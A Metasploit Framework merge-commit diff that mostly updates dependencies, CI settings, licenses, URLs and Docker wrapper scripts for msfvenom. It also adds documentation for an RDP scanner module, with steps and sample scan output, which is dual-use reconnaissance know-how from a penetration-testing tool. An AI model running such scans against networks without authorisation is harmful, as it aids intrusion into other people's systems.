Merge branch 'master' of https://github.com/rapid7/metasploit-framework into feature/linux_reverse_tcp_x64_retry

bug/bundler_fix
tkmru 2017-07-26 09:48:17 +09:00
commit eb536ba67c
3474 changed files with 6912 additions and 8585 deletions

View File

@ -90,7 +90,7 @@ data/java
# Avoid checking in Meterpreter libs that are built from # Avoid checking in Meterpreter libs that are built from
# private source. If you're interested in this functionality, # private source. If you're interested in this functionality,
# check out Metasploit Pro: http://metasploit.com/download # check out Metasploit Pro: https://metasploit.com/download
data/meterpreter/ext_server_pivot.*.dll data/meterpreter/ext_server_pivot.*.dll
# Avoid checking in metakitty, the source for # Avoid checking in metakitty, the source for

2
.gitignore vendored
View File

@ -78,7 +78,7 @@ data/java
# Avoid checking in Meterpreter libs that are built from # Avoid checking in Meterpreter libs that are built from
# private source. If you're interested in this functionality, # private source. If you're interested in this functionality,
# check out Metasploit Pro: http://metasploit.com/download # check out Metasploit Pro: https://metasploit.com/download
data/meterpreter/ext_server_pivot.*.dll data/meterpreter/ext_server_pivot.*.dll
# Avoid checking in metakitty, the source for # Avoid checking in metakitty, the source for

View File

@ -14,6 +14,22 @@ Metrics/ClassLength:
Exclude: Exclude:
- 'modules/**/*' - 'modules/**/*'
Metrics/AbcSize:
Enabled: false
Description: 'This is often a red-herring'
Metrics/CyclomaticComplexity:
Enabled: false
Description: 'This is often a red-herring'
Metrics/PerceivedComplexity:
Enabled: false
Description: 'This is often a red-herring'
Style/FrozenStringLiteralComment:
Enabled: false
Description: 'We cannot support this yet without a lot of things breaking'
Style/Documentation: Style/Documentation:
Enabled: true Enabled: true
Description: 'Most Metasploit modules do not have class documentation.' Description: 'Most Metasploit modules do not have class documentation.'

View File

@ -16,8 +16,6 @@ rvm:
- '2.4.1' - '2.4.1'
env: env:
# TODO: restore these tests when the code passes them!
# - CMD='bundle exec rake cucumber cucumber:boot CREATE_BINSTUBS=true'
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"' - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"' - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'

16
Gemfile
View File

@ -3,6 +3,14 @@ source 'https://rubygems.org'
# spec.add_runtime_dependency '<name>', [<version requirements>] # spec.add_runtime_dependency '<name>', [<version requirements>]
gemspec name: 'metasploit-framework' gemspec name: 'metasploit-framework'
# These pull in pre-release gems in order to fix specific issues.
# XXX https://github.com/alexdalitz/dnsruby/pull/134
gem 'dnsruby', git: 'https://github.com/alexdalitz/dnsruby'
# XXX https://github.com/ConnorAtherton/rb-readline/commit/fd882edcd145c26681f9971be5f6675c7f6d1970
gem 'rb-readline', git: 'https://github.com/ConnorAtherton/rb-readline' if [
'x86_64-linux', 'x86-linux', 'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
# separate from test as simplecov is not run on travis-ci # separate from test as simplecov is not run on travis-ci
group :coverage do group :coverage do
# code coverage for tests # code coverage for tests
@ -37,14 +45,6 @@ group :development, :test do
end end
group :test do group :test do
# cucumber extension for testing command line applications, like msfconsole
gem 'aruba'
# cucumber + automatic database cleaning with database_cleaner
gem 'cucumber-rails', :require => false
gem 'shoulda-matchers'
# Manipulate Time.now in specs # Manipulate Time.now in specs
gem 'timecop' gem 'timecop'
# Needed to work around a regression between capybara 2.7.1 and xpath 2.1
# XXX remove when capybara is updated to work with xpath 2.1
gem 'xpath', '2.0'
end end

View File

@ -1,7 +1,19 @@
GIT
remote: https://github.com/ConnorAtherton/rb-readline
revision: fd882edcd145c26681f9971be5f6675c7f6d1970
specs:
rb-readline (0.5.4)
GIT
remote: https://github.com/alexdalitz/dnsruby
revision: 09c3890ccfaedb7fd4951f56575d5c53651e0140
specs:
dnsruby (1.60.1)
PATH PATH
remote: . remote: .
specs: specs:
metasploit-framework (4.15.1) metasploit-framework (4.15.4)
actionpack (~> 4.2.6) actionpack (~> 4.2.6)
activerecord (~> 4.2.6) activerecord (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
@ -16,9 +28,9 @@ PATH
metasploit-concern metasploit-concern
metasploit-credential metasploit-credential
metasploit-model metasploit-model
metasploit-payloads (= 1.2.37) metasploit-payloads (= 1.2.44)
metasploit_data_models metasploit_data_models
metasploit_payloads-mettle (= 0.1.10) metasploit_payloads-mettle (= 0.1.14)
msgpack msgpack
nessus_rest nessus_rest
net-ssh net-ssh
@ -46,7 +58,7 @@ PATH
rex-mime rex-mime
rex-nop rex-nop
rex-ole rex-ole
rex-powershell rex-powershell (< 0.1.73)
rex-random_identifier rex-random_identifier
rex-registry rex-registry
rex-rop_builder rex-rop_builder
@ -102,48 +114,13 @@ GEM
arel (6.0.4) arel (6.0.4)
arel-helpers (2.4.0) arel-helpers (2.4.0)
activerecord (>= 3.1.0, < 6) activerecord (>= 3.1.0, < 6)
aruba (0.14.2)
childprocess (~> 0.5.6)
contracts (~> 0.9)
cucumber (>= 1.3.19)
ffi (~> 1.9.10)
rspec-expectations (>= 2.99)
thor (~> 0.19)
backports (3.8.0) backports (3.8.0)
bcrypt (3.1.11) bcrypt (3.1.11)
bindata (2.4.0) bindata (2.4.0)
bit-struct (0.16) bit-struct (0.16)
builder (3.2.3) builder (3.2.3)
capybara (2.14.4)
addressable
mime-types (>= 1.16)
nokogiri (>= 1.3.3)
rack (>= 1.0.0)
rack-test (>= 0.5.4)
xpath (~> 2.0)
childprocess (0.5.9)
ffi (~> 1.0, >= 1.0.11)
coderay (1.1.1) coderay (1.1.1)
contracts (0.16.0)
cucumber (2.4.0)
builder (>= 2.1.2)
cucumber-core (~> 1.5.0)
cucumber-wire (~> 0.0.1)
diff-lcs (>= 1.1.3)
gherkin (~> 4.0)
multi_json (>= 1.7.5, < 2.0)
multi_test (>= 0.1.2)
cucumber-core (1.5.0)
gherkin (~> 4.0)
cucumber-rails (1.5.0)
capybara (>= 1.1.2, < 3)
cucumber (>= 1.3.8, < 4)
mime-types (>= 1.17, < 4)
nokogiri (~> 1.5)
railties (>= 4, < 5.2)
cucumber-wire (0.0.1)
diff-lcs (1.3) diff-lcs (1.3)
dnsruby (1.60.1)
docile (1.1.5) docile (1.1.5)
erubis (2.7.0) erubis (2.7.0)
factory_girl (4.8.0) factory_girl (4.8.0)
@ -151,15 +128,13 @@ GEM
factory_girl_rails (4.8.0) factory_girl_rails (4.8.0)
factory_girl (~> 4.8.0) factory_girl (~> 4.8.0)
railties (>= 3.0.0) railties (>= 3.0.0)
faraday (0.12.1) faraday (0.12.2)
multipart-post (>= 1.2, < 3) multipart-post (>= 1.2, < 3)
ffi (1.9.18)
filesize (0.1.1) filesize (0.1.1)
fivemat (1.3.5) fivemat (1.3.5)
gherkin (4.1.3)
google-protobuf (3.3.0) google-protobuf (3.3.0)
googleauth (0.5.1) googleauth (0.5.2)
faraday (~> 0.9) faraday (~> 0.12)
jwt (~> 1.4) jwt (~> 1.4)
logging (~> 2.0) logging (~> 2.0)
memoist (~> 0.12) memoist (~> 0.12)
@ -203,7 +178,7 @@ GEM
activemodel (~> 4.2.6) activemodel (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
railties (~> 4.2.6) railties (~> 4.2.6)
metasploit-payloads (1.2.37) metasploit-payloads (1.2.44)
metasploit_data_models (2.0.15) metasploit_data_models (2.0.15)
activerecord (~> 4.2.6) activerecord (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
@ -214,16 +189,12 @@ GEM
postgres_ext postgres_ext
railties (~> 4.2.6) railties (~> 4.2.6)
recog (~> 2.0) recog (~> 2.0)
metasploit_payloads-mettle (0.1.10) metasploit_payloads-mettle (0.1.14)
method_source (0.8.2) method_source (0.8.2)
mime-types (3.1)
mime-types-data (~> 3.2015)
mime-types-data (3.2016.0521)
mini_portile2 (2.2.0) mini_portile2 (2.2.0)
minitest (5.10.2) minitest (5.10.3)
msgpack (1.1.0) msgpack (1.1.0)
multi_json (1.12.1) multi_json (1.12.1)
multi_test (0.1.2)
multipart-post (2.0.0) multipart-post (2.0.0)
nessus_rest (0.1.6) nessus_rest (0.1.6)
net-ssh (4.1.0) net-ssh (4.1.0)
@ -274,7 +245,6 @@ GEM
rake (>= 0.8.7) rake (>= 0.8.7)
thor (>= 0.18.1, < 2.0) thor (>= 0.18.1, < 2.0)
rake (12.0.0) rake (12.0.0)
rb-readline (0.5.4)
recog (2.1.11) recog (2.1.11)
nokogiri nokogiri
redcarpet (3.4.0) redcarpet (3.4.0)
@ -286,7 +256,7 @@ GEM
rex-core rex-core
rex-struct2 rex-struct2
rex-text rex-text
rex-core (0.1.11) rex-core (0.1.12)
rex-encoder (0.1.4) rex-encoder (0.1.4)
metasm metasm
rex-arch rex-arch
@ -358,8 +328,6 @@ GEM
sawyer (0.8.1) sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6) addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0) faraday (~> 0.8, < 1.0)
shoulda-matchers (3.1.2)
activesupport (>= 4.0.0)
signet (0.7.3) signet (0.7.3)
addressable (~> 2.3) addressable (~> 2.3)
faraday (~> 0.9) faraday (~> 0.9)
@ -386,16 +354,13 @@ GEM
activemodel (>= 4.2.7) activemodel (>= 4.2.7)
activesupport (>= 4.2.7) activesupport (>= 4.2.7)
xmlrpc (0.3.0) xmlrpc (0.3.0)
xpath (2.0.0)
nokogiri (~> 1.3)
yard (0.9.9) yard (0.9.9)
PLATFORMS PLATFORMS
ruby ruby
DEPENDENCIES DEPENDENCIES
aruba dnsruby!
cucumber-rails
factory_girl_rails factory_girl_rails
fivemat fivemat
metasploit-aggregator metasploit-aggregator
@ -403,14 +368,13 @@ DEPENDENCIES
octokit octokit
pry pry
rake rake
rb-readline!
redcarpet redcarpet
rspec-rails rspec-rails
rspec-rerun rspec-rerun
shoulda-matchers
simplecov simplecov
timecop timecop
xpath (= 2.0)
yard yard
BUNDLED WITH BUNDLED WITH
1.15.1 1.15.3

View File

@ -1,71 +1,62 @@
This file is auto-generated by tools/dev/update_gem_licenses.sh This file is auto-generated by tools/dev/update_gem_licenses.sh
actionpack, 4.2.8, MIT Ascii85, 1.0.2, MIT
actionview, 4.2.8, MIT actionpack, 4.2.9, MIT
activemodel, 4.2.8, MIT actionview, 4.2.9, MIT
activerecord, 4.2.8, MIT activemodel, 4.2.9, MIT
activesupport, 4.2.8, MIT activerecord, 4.2.9, MIT
activesupport, 4.2.9, MIT
addressable, 2.5.1, "Apache 2.0" addressable, 2.5.1, "Apache 2.0"
afm, 0.2.2, MIT
arel, 6.0.4, MIT arel, 6.0.4, MIT
arel-helpers, 2.4.0, unknown arel-helpers, 2.4.0, unknown
aruba, 0.14.2, MIT
backports, 3.8.0, MIT backports, 3.8.0, MIT
bcrypt, 3.1.11, MIT bcrypt, 3.1.11, MIT
bindata, 2.4.0, ruby bindata, 2.4.0, ruby
bit-struct, 0.16, ruby bit-struct, 0.16, ruby
builder, 3.2.3, MIT builder, 3.2.3, MIT
bundler, 1.15.0, MIT bundler, 1.15.1, MIT
capybara, 2.14.0, MIT
childprocess, 0.5.9, MIT
coderay, 1.1.1, MIT coderay, 1.1.1, MIT
contracts, 0.16.0, "Simplified BSD"
cucumber, 2.4.0, MIT
cucumber-core, 1.5.0, MIT
cucumber-rails, 1.5.0, MIT
cucumber-wire, 0.0.1, MIT
diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+" diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
dnsruby, 1.60.1, "Apache 2.0"
docile, 1.1.5, MIT docile, 1.1.5, MIT
erubis, 2.7.0, MIT erubis, 2.7.0, MIT
factory_girl, 4.8.0, MIT factory_girl, 4.8.0, MIT
factory_girl_rails, 4.8.0, MIT factory_girl_rails, 4.8.0, MIT
faraday, 0.12.1, MIT faraday, 0.12.1, MIT
ffi, 1.9.18, "New BSD"
filesize, 0.1.1, MIT filesize, 0.1.1, MIT
fivemat, 1.3.3, MIT fivemat, 1.3.5, MIT
gherkin, 4.1.3, MIT
google-protobuf, 3.3.0, "New BSD" google-protobuf, 3.3.0, "New BSD"
googleauth, 0.5.1, "Apache 2.0" googleauth, 0.5.1, "Apache 2.0"
grpc, 1.3.4, "New BSD" grpc, 1.4.1, "New BSD"
i18n, 0.8.1, MIT hashery, 2.1.2, "Simplified BSD"
i18n, 0.8.6, MIT
jsobfu, 0.4.2, "New BSD" jsobfu, 0.4.2, "New BSD"
json, 2.1.0, ruby json, 2.1.0, ruby
jwt, 1.5.6, MIT jwt, 1.5.6, MIT
little-plugger, 1.1.4, MIT little-plugger, 1.1.4, MIT
logging, 2.2.2, MIT logging, 2.2.2, MIT
loofah, 2.0.3, MIT loofah, 2.0.3, MIT
memoist, 0.15.0, MIT memoist, 0.16.0, MIT
metasm, 1.0.3, LGPL metasm, 1.0.3, LGPL
metasploit-aggregator, 0.2.1, "New BSD" metasploit-aggregator, 0.2.1, "New BSD"
metasploit-concern, 2.0.4, "New BSD" metasploit-concern, 2.0.5, "New BSD"
metasploit-credential, 2.0.9, "New BSD" metasploit-credential, 2.0.10, "New BSD"
metasploit-framework, 4.14.23, "New BSD" metasploit-framework, 4.15.0, "New BSD"
metasploit-model, 2.0.4, "New BSD" metasploit-model, 2.0.4, "New BSD"
metasploit-payloads, 1.2.29, "3-clause (or ""modified"") BSD" metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
metasploit_data_models, 2.0.14, "New BSD" metasploit_data_models, 2.0.15, "New BSD"
metasploit_payloads-mettle, 0.1.9, "3-clause (or ""modified"") BSD" metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
method_source, 0.8.2, MIT method_source, 0.8.2, MIT
mime-types, 3.1, MIT mini_portile2, 2.2.0, MIT
mime-types-data, 3.2016.0521, MIT
mini_portile2, 2.1.0, MIT
minitest, 5.10.2, MIT minitest, 5.10.2, MIT
msgpack, 1.1.0, "Apache 2.0" msgpack, 1.1.0, "Apache 2.0"
multi_json, 1.12.1, MIT multi_json, 1.12.1, MIT
multi_test, 0.1.2, MIT
multipart-post, 2.0.0, MIT multipart-post, 2.0.0, MIT
nessus_rest, 0.1.6, MIT nessus_rest, 0.1.6, MIT
net-ssh, 4.1.0, MIT net-ssh, 4.1.0, MIT
network_interface, 0.0.1, MIT network_interface, 0.0.1, MIT
nexpose, 6.0.0, BSD nexpose, 6.1.0, BSD
nokogiri, 1.7.2, MIT nokogiri, 1.8.0, MIT
octokit, 4.7.0, MIT octokit, 4.7.0, MIT
openssl-ccm, 1.2.1, MIT openssl-ccm, 1.2.1, MIT
openvas-omp, 0.0.4, MIT openvas-omp, 0.0.4, MIT
@ -73,6 +64,7 @@ os, 0.9.6, MIT
packetfu, 1.1.13, BSD packetfu, 1.1.13, BSD
patch_finder, 1.0.2, "New BSD" patch_finder, 1.0.2, "New BSD"
pcaprub, 0.12.4, LGPL-2.1 pcaprub, 0.12.4, LGPL-2.1
pdf-reader, 2.0.0, MIT
pg, 0.20.0, "New BSD" pg, 0.20.0, "New BSD"
pg_array_parser, 0.0.9, unknown pg_array_parser, 0.0.9, unknown
postgres_ext, 3.0.0, MIT postgres_ext, 3.0.0, MIT
@ -83,14 +75,14 @@ rack-test, 0.6.3, MIT
rails-deprecated_sanitizer, 1.0.3, MIT rails-deprecated_sanitizer, 1.0.3, MIT
rails-dom-testing, 1.0.8, MIT rails-dom-testing, 1.0.8, MIT
rails-html-sanitizer, 1.0.3, MIT rails-html-sanitizer, 1.0.3, MIT
railties, 4.2.8, MIT railties, 4.2.9, MIT
rake, 12.0.0, MIT rake, 12.0.0, MIT
rb-readline, 0.5.4, BSD rb-readline, 0.5.4, BSD
recog, 2.1.8, unknown recog, 2.1.11, unknown
redcarpet, 3.4.0, MIT redcarpet, 3.4.0, MIT
rex-arch, 0.1.4, "New BSD" rex-arch, 0.1.9, "New BSD"
rex-bin_tools, 0.1.3, "New BSD" rex-bin_tools, 0.1.4, "New BSD"
rex-core, 0.1.10, "New BSD" rex-core, 0.1.11, "New BSD"
rex-encoder, 0.1.4, "New BSD" rex-encoder, 0.1.4, "New BSD"
rex-exploitation, 0.1.14, "New BSD" rex-exploitation, 0.1.14, "New BSD"
rex-java, 0.1.5, "New BSD" rex-java, 0.1.5, "New BSD"
@ -101,23 +93,25 @@ rex-powershell, 0.1.72, "New BSD"
rex-random_identifier, 0.1.2, "New BSD" rex-random_identifier, 0.1.2, "New BSD"
rex-registry, 0.1.3, "New BSD" rex-registry, 0.1.3, "New BSD"
rex-rop_builder, 0.1.3, "New BSD" rex-rop_builder, 0.1.3, "New BSD"
rex-socket, 0.1.6, "New BSD" rex-socket, 0.1.8, "New BSD"
rex-sslscan, 0.1.4, "New BSD" rex-sslscan, 0.1.4, "New BSD"
rex-struct2, 0.1.2, "New BSD" rex-struct2, 0.1.2, "New BSD"
rex-text, 0.2.15, "New BSD" rex-text, 0.2.15, "New BSD"
rex-zip, 0.1.3, "New BSD" rex-zip, 0.1.3, "New BSD"
rkelly-remix, 0.0.7, MIT rkelly-remix, 0.0.7, MIT
robots, 0.10.1, MIT robots, 0.10.1, MIT
rspec, 3.6.0, MIT
rspec-core, 3.6.0, MIT rspec-core, 3.6.0, MIT
rspec-expectations, 3.6.0, MIT rspec-expectations, 3.6.0, MIT
rspec-mocks, 3.6.0, MIT rspec-mocks, 3.6.0, MIT
rspec-rails, 3.6.0, MIT rspec-rails, 3.6.0, MIT
rspec-rerun, 1.1.0, MIT
rspec-support, 3.6.0, MIT rspec-support, 3.6.0, MIT
ruby_smb, 0.0.17, "New BSD" ruby-rc4, 0.1.5, MIT
ruby_smb, 0.0.18, "New BSD"
rubyntlm, 0.6.2, MIT rubyntlm, 0.6.2, MIT
rubyzip, 1.2.1, "Simplified BSD" rubyzip, 1.2.1, "Simplified BSD"
sawyer, 0.8.1, MIT sawyer, 0.8.1, MIT
shoulda-matchers, 3.1.1, MIT
signet, 0.7.3, "Apache 2.0" signet, 0.7.3, "Apache 2.0"
simplecov, 0.14.1, MIT simplecov, 0.14.1, MIT
simplecov-html, 0.10.1, MIT simplecov-html, 0.10.1, MIT
@ -126,10 +120,11 @@ sqlite3, 1.3.13, "New BSD"
sshkey, 1.9.0, MIT sshkey, 1.9.0, MIT
thor, 0.19.4, MIT thor, 0.19.4, MIT
thread_safe, 0.3.6, "Apache 2.0" thread_safe, 0.3.6, "Apache 2.0"
timecop, 0.8.1, MIT timecop, 0.9.1, MIT
ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
tzinfo, 1.2.3, MIT tzinfo, 1.2.3, MIT
tzinfo-data, 1.2017.2, MIT tzinfo-data, 1.2017.2, MIT
windows_error, 0.1.2, BSD windows_error, 0.1.2, BSD
xdr, 2.0.0, "Apache 2.0"
xmlrpc, 0.3.0, ruby xmlrpc, 0.3.0, ruby
xpath, 2.1.0, MIT
yard, 0.9.9, MIT yard, 0.9.9, MIT

View File

@ -14,8 +14,7 @@ New bugs and feature requests should be directed to:
API documentation for writing modules can be found at: API documentation for writing modules can be found at:
https://rapid7.github.io/metasploit-framework/api https://rapid7.github.io/metasploit-framework/api
Questions and suggestions can be sent to: Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
Installing Installing
-- --

View File

@ -15,5 +15,5 @@
| %bld[ OK ]%clr | | %bld[ OK ]%clr |
|______________________________________________________________________________| |______________________________________________________________________________|
| | | |
| http://metasploit.com | | https://metasploit.com |
|______________________________________________________________________________|%clr |______________________________________________________________________________|%clr

View File

@ -18,4 +18,4 @@
%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr %bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr
%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr %bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr
%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr %bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
%clr%bld http://metasploit.com %clr%bld https://metasploit.com

View File

@ -27,4 +27,4 @@
################################################################################ ################################################################################
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr # # %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
################################################################################ ################################################################################
http://metasploit.com%clr https://metasploit.com%clr

View File

@ -27,4 +27,4 @@
# # ### # # ## # # ### # # ##
######################## ########################
## ## ## ## ## ## ## ##
http://metasploit.com%clr https://metasploit.com%clr

View File

@ -1,7 +1,7 @@
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% http://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%% %% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

View File

@ -23,4 +23,4 @@
; ,''-,;' ``- ; ,''-,;' ``-
``-..__``--` ``-..__``--`
http://metasploit.com%clr https://metasploit.com%clr

View File

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

View File

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

View File

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

View File

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

View File

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

View File

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

View File

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

View File

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

View File

@ -188,7 +188,7 @@
</div> </div>
</div> </div>
<div class="footer"> <div class="footer">
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center> <center><a href="https://metasploit.com/" target="_blank">metasploit.com</a></center>
</div> </div>
</body> </body>
</html> </html>

View File

@ -195,7 +195,7 @@
</div> </div>
<div class="footer"> <div class="footer">
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center> <center><a href="https://metasploit.com/" target="_blank">metasploit.com</a></center>
</div> </div>
</body> </body>

View File

@ -24,7 +24,6 @@ RUN apk update && \
bison \ bison \
build-base \ build-base \
ruby-dev \ ruby-dev \
libffi-dev\
openssl-dev \ openssl-dev \
readline-dev \ readline-dev \
sqlite-dev \ sqlite-dev \
@ -35,6 +34,7 @@ RUN apk update && \
yaml-dev \ yaml-dev \
zlib-dev \ zlib-dev \
ncurses-dev \ ncurses-dev \
git \
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \ && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
&& bundle install --system $BUNDLER_ARGS \ && bundle install --system $BUNDLER_ARGS \
&& apk del .ruby-builddeps \ && apk del .ruby-builddeps \

View File

@ -17,5 +17,9 @@ if [[ -z "$MSF_PATH" ]]; then
MSF_PATH=$(dirname $(dirname $path)) MSF_PATH=$(dirname $(dirname $path))
fi fi
if [[ -n "$MSF_BUILD" ]]; then
docker-compose -f $MSF_PATH/docker-compose.yml build
fi
cd $MSF_PATH cd $MSF_PATH
docker-compose run --rm --service-ports ms ./msfvenom "$@" docker-compose run --rm --service-ports ms ./msfvenom "$@"

26
docker/bin/msfvenom-dev Executable file
View File

@ -0,0 +1,26 @@
#! /bin/bash
if [[ -z "$MSF_PATH" ]]; then
path=`dirname $0`
# check for ./docker/msfconsole.rc
if [[ ! -f $path/../msfconsole.rc ]] ; then
# we are not inside the project
realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
# determine script path
pushd $(dirname $(realpath $0)) > /dev/null
path=$(pwd)
popd > /dev/null
fi
MSF_PATH=$(dirname $(dirname $path))
fi
cd $MSF_PATH
if [[ -n "$MSF_BUILD" ]]; then
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build
fi
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfvenom "$@"

View File

@ -0,0 +1,66 @@
## Vulnerable Application
Any system exposing the remote desktop protocol, RDP, typically on 3389/TCP.
## Verification Steps
1. Do: ```use auxiliary/scanner/rdp/rdp_scanner```
2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of RDP
3. Do: ```run```
4. If the host is exposing an identifiable RDP instance, it will print the endpoint.
## Options
There are three options currently supported that control what security protocols to
send in the RDP negotiation request, which can be helpful in identifying RDP
endpoints that might be locked down or configured differently:
**TLS** Set to true to request TLS security support
**CredSSP** Set to true to request CredSSP support
**EarlyUser** Set to true to request Early User Authorization Result PDU support
## Scenarios
```
msf auxiliary(rdp_scanner) > run
[+] 10.4.18.26:3389 - Identified RDP
[+] 10.4.18.22:3389 - Identified RDP
[+] 10.4.18.89:3389 - Identified RDP
[+] 10.4.18.9:3389 - Identified RDP
[+] 10.4.18.67:3389 - Identified RDP
[+] 10.4.18.80:3389 - Identified RDP
[+] 10.4.18.34:3389 - Identified RDP
[+] 10.4.18.70:3389 - Identified RDP
[+] 10.4.18.30:3389 - Identified RDP
[+] 10.4.18.76:3389 - Identified RDP
[+] 10.4.18.13:3389 - Identified RDP
[+] 10.4.18.91:3389 - Identified RDP
[+] 10.4.18.5:3389 - Identified RDP
[+] 10.4.18.47:3389 - Identified RDP
[+] 10.4.18.41:3389 - Identified RDP
[+] 10.4.18.105:3389 - Identified RDP
[*] Scanned 44 of 256 hosts (17% complete)
[*] Scanned 55 of 256 hosts (21% complete)
[+] 10.4.18.118:3389 - Identified RDP
[+] 10.4.18.108:3389 - Identified RDP
[+] 10.4.18.139:3389 - Identified RDP
[*] Scanned 94 of 256 hosts (36% complete)
[*] Scanned 110 of 256 hosts (42% complete)
[+] 10.4.18.157:3389 - Identified RDP
[+] 10.4.18.166:3389 - Identified RDP
[+] 10.4.18.164:3389 - Identified RDP
[+] 10.4.18.170:3389 - Identified RDP
[+] 10.4.18.185:3389 - Identified RDP
[+] 10.4.18.209:3389 - Identified RDP
[+] 10.4.18.188:3389 - Identified RDP
[*] Scanned 156 of 256 hosts (60% complete)
[+] 10.4.18.237:3389 - Identified RDP
[+] 10.4.18.225:3389 - Identified RDP
[*] Scanned 186 of 256 hosts (72% complete)
[*] Scanned 194 of 256 hosts (75% complete)
[*] Scanned 208 of 256 hosts (81% complete)
[*] Scanned 253 of 256 hosts (98% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
```

View File

@ -0,0 +1,48 @@
